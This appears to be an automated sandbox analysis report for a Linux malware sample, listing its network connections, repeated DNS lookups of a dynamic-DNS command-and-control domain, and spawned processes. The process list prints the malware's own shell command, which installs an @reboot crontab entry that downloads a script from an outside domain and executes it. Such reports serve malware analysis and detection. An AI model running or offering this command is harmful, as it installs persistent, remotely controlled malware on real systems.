                                                                  Nov 9, 2024 23:05:00.721054077 CET112044307891.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:00.721106052 CET4307811204192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:00.725898981 CET112044307891.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:01.611526012 CET112044307891.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:01.611722946 CET112044307891.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:01.611778021 CET4307811204192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:01.611810923 CET4307811204192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:01.611900091 CET4307811204192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:06.642304897 CET3702815588192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:06.647197008 CET155883702891.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:06.647293091 CET3702815588192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:06.647330999 CET3702815588192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:06.652131081 CET155883702891.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:06.652194023 CET3702815588192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:06.657023907 CET155883702891.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:07.526448011 CET155883702891.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:07.526463032 CET155883702891.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:07.526839972 CET3702815588192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:07.526839972 CET3702815588192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:07.527101994 CET3702815588192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:12.540920973 CET5766620750192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:12.545681000 CET207505766691.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:12.545780897 CET5766620750192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:12.545794964 CET5766620750192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:12.550873041 CET207505766691.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:12.550940037 CET5766620750192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:12.555845976 CET207505766691.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:13.443093061 CET207505766691.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:13.443113089 CET207505766691.149.218.232192.168.2.23
                                                                  Nov 9, 2024 23:05:13.443711042 CET5766620750192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:13.443711042 CET5766620750192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:13.443814039 CET5766620750192.168.2.2391.149.218.232
                                                                  Nov 9, 2024 23:05:14.098709106 CET42836443192.168.2.2391.189.91.43
                                                                  Nov 9, 2024 23:05:23.464217901 CET515447293192.168.2.2331.13.248.89
                                                                  Nov 9, 2024 23:05:23.469186068 CET72935154431.13.248.89192.168.2.23
                                                                  Nov 9, 2024 23:05:23.469294071 CET515447293192.168.2.2331.13.248.89
                                                                  Nov 9, 2024 23:05:23.469352007 CET515447293192.168.2.2331.13.248.89
                                                                  Nov 9, 2024 23:05:23.474267960 CET72935154431.13.248.89192.168.2.23
                                                                  Nov 9, 2024 23:05:23.474344969 CET515447293192.168.2.2331.13.248.89
                                                                  Nov 9, 2024 23:05:23.479232073 CET72935154431.13.248.89192.168.2.23
                                                                  Nov 9, 2024 23:05:24.460608959 CET72935154431.13.248.89192.168.2.23
                                                                  Nov 9, 2024 23:05:24.460796118 CET515447293192.168.2.2331.13.248.89
                                                                  Nov 9, 2024 23:05:24.460796118 CET515447293192.168.2.2331.13.248.89
                                                                  Nov 9, 2024 23:05:49.486831903 CET515467293192.168.2.2331.13.248.89
                                                                  Nov 9, 2024 23:05:49.492135048 CET72935154631.13.248.89192.168.2.23
                                                                  Nov 9, 2024 23:05:49.492211103 CET515467293192.168.2.2331.13.248.89
                                                                  Nov 9, 2024 23:05:49.492261887 CET515467293192.168.2.2331.13.248.89
                                                                  Nov 9, 2024 23:05:49.499027014 CET72935154631.13.248.89192.168.2.23
                                                                  Nov 9, 2024 23:05:49.499089003 CET515467293192.168.2.2331.13.248.89
                                                                  Nov 9, 2024 23:05:49.504720926 CET72935154631.13.248.89192.168.2.23
                                                                  Nov 9, 2024 23:05:50.511017084 CET72935154631.13.248.89192.168.2.23
                                                                  Nov 9, 2024 23:05:50.511356115 CET515467293192.168.2.2331.13.248.89
                                                                  Nov 9, 2024 23:05:50.511356115 CET515467293192.168.2.2331.13.248.89
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 9, 2024 23:03:49.493223906 CET5172153192.168.2.23139.84.165.176
                                                                  Nov 9, 2024 23:03:49.613197088 CET5145953192.168.2.23139.84.165.176
                                                                  Nov 9, 2024 23:03:54.498627901 CET5972053192.168.2.2380.152.203.134
                                                                  Nov 9, 2024 23:03:54.545224905 CET535972080.152.203.134192.168.2.23
                                                                  Nov 9, 2024 23:03:54.618506908 CET4049253192.168.2.2380.152.203.134
                                                                  Nov 9, 2024 23:03:54.656021118 CET534049280.152.203.134192.168.2.23
                                                                  Nov 9, 2024 23:04:00.903851986 CET5054153192.168.2.23137.220.52.23
                                                                  Nov 9, 2024 23:04:05.909435987 CET4911253192.168.2.2370.34.254.19
                                                                  Nov 9, 2024 23:04:10.915724039 CET5548653192.168.2.2381.169.136.222
                                                                  Nov 9, 2024 23:04:10.943531990 CET535548681.169.136.222192.168.2.23
                                                                  Nov 9, 2024 23:04:17.311188936 CET4436353192.168.2.235.161.109.23
                                                                  Nov 9, 2024 23:04:22.317528009 CET5867153192.168.2.23202.61.197.122
                                                                  Nov 9, 2024 23:04:22.328210115 CET5358671202.61.197.122192.168.2.23
                                                                  Nov 9, 2024 23:04:28.717122078 CET4401453192.168.2.23185.181.61.24
                                                                  Nov 9, 2024 23:04:28.750224113 CET5344014185.181.61.24192.168.2.23
                                                                  Nov 9, 2024 23:04:34.714863062 CET5872053192.168.2.23139.84.165.176
                                                                  Nov 9, 2024 23:04:39.720645905 CET4299353192.168.2.2370.34.254.19
                                                                  Nov 9, 2024 23:04:44.726309061 CET4268853192.168.2.2380.152.203.134
                                                                  Nov 9, 2024 23:04:44.786645889 CET534268880.152.203.134192.168.2.23
                                                                  Nov 9, 2024 23:04:50.690912962 CET4681853192.168.2.2364.176.6.48
                                                                  Nov 9, 2024 23:04:55.694192886 CET4366953192.168.2.2364.176.6.48
                                                                  Nov 9, 2024 23:05:00.700339079 CET5812553192.168.2.23152.53.15.127
                                                                  Nov 9, 2024 23:05:00.710652113 CET5358125152.53.15.127192.168.2.23
                                                                  Nov 9, 2024 23:05:06.614775896 CET3336653192.168.2.2365.21.1.106
                                                                  Nov 9, 2024 23:05:06.641166925 CET533336665.21.1.106192.168.2.23
                                                                  Nov 9, 2024 23:05:12.529377937 CET4739853192.168.2.23152.53.15.127
                                                                  Nov 9, 2024 23:05:12.540266037 CET5347398152.53.15.127192.168.2.23
                                                                  Nov 9, 2024 23:05:18.446301937 CET5304653192.168.2.2370.34.254.19
                                                                  Nov 9, 2024 23:05:23.452819109 CET4223253192.168.2.23194.36.144.87
                                                                  Nov 9, 2024 23:05:23.463280916 CET5342232194.36.144.87192.168.2.23
                                                                  Nov 9, 2024 23:05:29.462748051 CET4292453192.168.2.23139.84.165.176
                                                                  Nov 9, 2024 23:05:34.468481064 CET4680053192.168.2.23139.84.165.176
                                                                  Nov 9, 2024 23:05:39.474741936 CET4834653192.168.2.2370.34.254.19
                                                                  Nov 9, 2024 23:05:44.481156111 CET4753153192.168.2.23178.254.22.166
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 9, 2024 23:03:49.493223906 CET192.168.2.23139.84.165.1760x9b91Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:03:54.498627901 CET192.168.2.2380.152.203.1340xf515Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:00.903851986 CET192.168.2.23137.220.52.230xb1caStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:05.909435987 CET192.168.2.2370.34.254.190x4453Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:10.915724039 CET192.168.2.2381.169.136.2220xc91Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:17.311188936 CET192.168.2.235.161.109.230x5e09Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:22.317528009 CET192.168.2.23202.61.197.1220x7785Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:28.717122078 CET192.168.2.23185.181.61.240x5ecdStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:34.714863062 CET192.168.2.23139.84.165.1760x2a4dStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:39.720645905 CET192.168.2.2370.34.254.190x86e3Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:44.726309061 CET192.168.2.2380.152.203.1340xff27Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:50.690912962 CET192.168.2.2364.176.6.480x321cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:55.694192886 CET192.168.2.2364.176.6.480x22a0Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:00.700339079 CET192.168.2.23152.53.15.1270x3f48Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:06.614775896 CET192.168.2.2365.21.1.1060x2281Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:12.529377937 CET192.168.2.23152.53.15.1270xac8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:18.446301937 CET192.168.2.2370.34.254.190xca69Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:23.452819109 CET192.168.2.23194.36.144.870xc3fcStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:29.462748051 CET192.168.2.23139.84.165.1760x3078Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:34.468481064 CET192.168.2.23139.84.165.1760xe68bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:39.474741936 CET192.168.2.2370.34.254.190xfae8Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:44.481156111 CET192.168.2.23178.254.22.1660x6e1eStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 9, 2024 23:03:54.545224905 CET80.152.203.134192.168.2.230xf515No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:03:54.545224905 CET80.152.203.134192.168.2.230xf515No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:03:54.545224905 CET80.152.203.134192.168.2.230xf515No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:03:54.545224905 CET80.152.203.134192.168.2.230xf515No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:03:54.545224905 CET80.152.203.134192.168.2.230xf515No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:03:54.545224905 CET80.152.203.134192.168.2.230xf515No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:03:54.545224905 CET80.152.203.134192.168.2.230xf515No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:03:54.545224905 CET80.152.203.134192.168.2.230xf515No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:03:54.545224905 CET80.152.203.134192.168.2.230xf515No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:10.943531990 CET81.169.136.222192.168.2.230xc91No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:10.943531990 CET81.169.136.222192.168.2.230xc91No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:10.943531990 CET81.169.136.222192.168.2.230xc91No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:10.943531990 CET81.169.136.222192.168.2.230xc91No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:10.943531990 CET81.169.136.222192.168.2.230xc91No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:10.943531990 CET81.169.136.222192.168.2.230xc91No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:10.943531990 CET81.169.136.222192.168.2.230xc91No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:10.943531990 CET81.169.136.222192.168.2.230xc91No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:10.943531990 CET81.169.136.222192.168.2.230xc91No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:22.328210115 CET202.61.197.122192.168.2.230x7785No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:22.328210115 CET202.61.197.122192.168.2.230x7785No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:22.328210115 CET202.61.197.122192.168.2.230x7785No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:22.328210115 CET202.61.197.122192.168.2.230x7785No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:22.328210115 CET202.61.197.122192.168.2.230x7785No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:22.328210115 CET202.61.197.122192.168.2.230x7785No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:22.328210115 CET202.61.197.122192.168.2.230x7785No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:22.328210115 CET202.61.197.122192.168.2.230x7785No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:22.328210115 CET202.61.197.122192.168.2.230x7785No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:28.750224113 CET185.181.61.24192.168.2.230x5ecdNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:28.750224113 CET185.181.61.24192.168.2.230x5ecdNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:28.750224113 CET185.181.61.24192.168.2.230x5ecdNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:28.750224113 CET185.181.61.24192.168.2.230x5ecdNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:28.750224113 CET185.181.61.24192.168.2.230x5ecdNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:28.750224113 CET185.181.61.24192.168.2.230x5ecdNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:28.750224113 CET185.181.61.24192.168.2.230x5ecdNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:28.750224113 CET185.181.61.24192.168.2.230x5ecdNo error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:28.750224113 CET185.181.61.24192.168.2.230x5ecdNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:44.786645889 CET80.152.203.134192.168.2.230xff27No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:44.786645889 CET80.152.203.134192.168.2.230xff27No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:44.786645889 CET80.152.203.134192.168.2.230xff27No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:44.786645889 CET80.152.203.134192.168.2.230xff27No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:44.786645889 CET80.152.203.134192.168.2.230xff27No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:44.786645889 CET80.152.203.134192.168.2.230xff27No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:44.786645889 CET80.152.203.134192.168.2.230xff27No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:44.786645889 CET80.152.203.134192.168.2.230xff27No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:04:44.786645889 CET80.152.203.134192.168.2.230xff27No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:00.710652113 CET152.53.15.127192.168.2.230x3f48No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:00.710652113 CET152.53.15.127192.168.2.230x3f48No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:00.710652113 CET152.53.15.127192.168.2.230x3f48No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:00.710652113 CET152.53.15.127192.168.2.230x3f48No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:00.710652113 CET152.53.15.127192.168.2.230x3f48No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:00.710652113 CET152.53.15.127192.168.2.230x3f48No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:00.710652113 CET152.53.15.127192.168.2.230x3f48No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:00.710652113 CET152.53.15.127192.168.2.230x3f48No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:00.710652113 CET152.53.15.127192.168.2.230x3f48No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:06.641166925 CET65.21.1.106192.168.2.230x2281No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:06.641166925 CET65.21.1.106192.168.2.230x2281No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:06.641166925 CET65.21.1.106192.168.2.230x2281No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:06.641166925 CET65.21.1.106192.168.2.230x2281No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:06.641166925 CET65.21.1.106192.168.2.230x2281No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:06.641166925 CET65.21.1.106192.168.2.230x2281No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:06.641166925 CET65.21.1.106192.168.2.230x2281No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:06.641166925 CET65.21.1.106192.168.2.230x2281No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:06.641166925 CET65.21.1.106192.168.2.230x2281No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:12.540266037 CET152.53.15.127192.168.2.230xac8No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:12.540266037 CET152.53.15.127192.168.2.230xac8No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:12.540266037 CET152.53.15.127192.168.2.230xac8No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:12.540266037 CET152.53.15.127192.168.2.230xac8No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:12.540266037 CET152.53.15.127192.168.2.230xac8No error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:12.540266037 CET152.53.15.127192.168.2.230xac8No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:12.540266037 CET152.53.15.127192.168.2.230xac8No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:12.540266037 CET152.53.15.127192.168.2.230xac8No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:12.540266037 CET152.53.15.127192.168.2.230xac8No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:23.463280916 CET194.36.144.87192.168.2.230xc3fcNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:23.463280916 CET194.36.144.87192.168.2.230xc3fcNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:23.463280916 CET194.36.144.87192.168.2.230xc3fcNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:23.463280916 CET194.36.144.87192.168.2.230xc3fcNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:23.463280916 CET194.36.144.87192.168.2.230xc3fcNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:23.463280916 CET194.36.144.87192.168.2.230xc3fcNo error (0)kingstonwikkerink.dyn217.28.130.41A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:23.463280916 CET194.36.144.87192.168.2.230xc3fcNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:23.463280916 CET194.36.144.87192.168.2.230xc3fcNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                  Nov 9, 2024 23:05:23.463280916 CET194.36.144.87192.168.2.230xc3fcNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false

                                                                  System Behavior

                                                                  Start time (UTC):22:03:49
                                                                  Start date (UTC):09/11/2024
                                                                  Path:/tmp/nshsh4.elf
                                                                  Arguments:/tmp/nshsh4.elf
                                                                  File size:4139976 bytes
                                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                  Start time (UTC):22:03:49
                                                                  Start date (UTC):09/11/2024
                                                                  Path:/tmp/nshsh4.elf
                                                                  Arguments:-
                                                                  File size:4139976 bytes
                                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                  Start time (UTC):22:03:49
                                                                  Start date (UTC):09/11/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:03:49
                                                                  Start date (UTC):09/11/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:03:49
                                                                  Start date (UTC):09/11/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:03:49
                                                                  Start date (UTC):09/11/2024
                                                                  Path:/usr/bin/crontab
                                                                  Arguments:crontab -l
                                                                  File size:43720 bytes
                                                                  MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                  Start time (UTC):22:03:49
                                                                  Start date (UTC):09/11/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:03:49
                                                                  Start date (UTC):09/11/2024
                                                                  Path:/usr/bin/crontab
                                                                  Arguments:crontab -
                                                                  File size:43720 bytes
                                                                  MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                  Start time (UTC):22:03:49
                                                                  Start date (UTC):09/11/2024
                                                                  Path:/tmp/nshsh4.elf
                                                                  Arguments:-
                                                                  File size:4139976 bytes
                                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                  Start time (UTC):22:03:49
                                                                  Start date (UTC):09/11/2024
                                                                  Path:/tmp/nshsh4.elf
                                                                  Arguments:-
                                                                  File size:4139976 bytes
                                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                                                                  Start time (UTC):22:03:49
                                                                  Start date (UTC):09/11/2024
                                                                  Path:/tmp/nshsh4.elf
                                                                  Arguments:-
                                                                  File size:4139976 bytes
                                                                  MD5 hash:8943e5f8f8c280467b4472c15ae93ba9